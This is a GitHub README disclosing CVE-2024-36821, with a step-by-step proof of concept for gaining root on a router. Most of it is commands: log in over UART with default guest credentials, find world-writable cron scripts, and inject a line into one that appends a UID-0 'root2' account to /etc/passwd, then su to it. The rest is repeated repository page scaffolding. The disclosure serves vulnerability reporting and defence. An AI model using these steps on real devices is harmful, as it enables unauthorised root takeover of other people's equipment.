CVE-2024-36821

The public reference that contains the minimum require information for the vulnerability covered by CVE-2024-36821

The original video with PoC you may find on the video -> https://www.youtube.com/watch?v=6vHno0ik7JY

The PoC:

Connect to the router witnin UART conenction
Using guest:guest credentials, log into the system

Using find / -perm -777 -type f 2>/dev/null command, find files with read-write-execute permissions:

1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh

Check the owner by ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh command
Generate the password by openssl passwd Abracadabra command
Edit /tmp/cron/cron.everyminute/conntrack_collector.sh, adding to the end the new generated password:
```
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
```
Wait for a minute
Switch user into root2 by the next command
```
/ $ su root2
Password: Abracadabra
~ #
```

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-36821

The original video with PoC you may find on the video -> https://www.youtube.com/watch?v=6vHno0ik7JY

The PoC:

About

Releases

Packages

IvanGlinkin/CVE-2024-36821

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-36821

The original video with PoC you may find on the video -> https://www.youtube.com/watch?v=6vHno0ik7JY

The PoC:

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages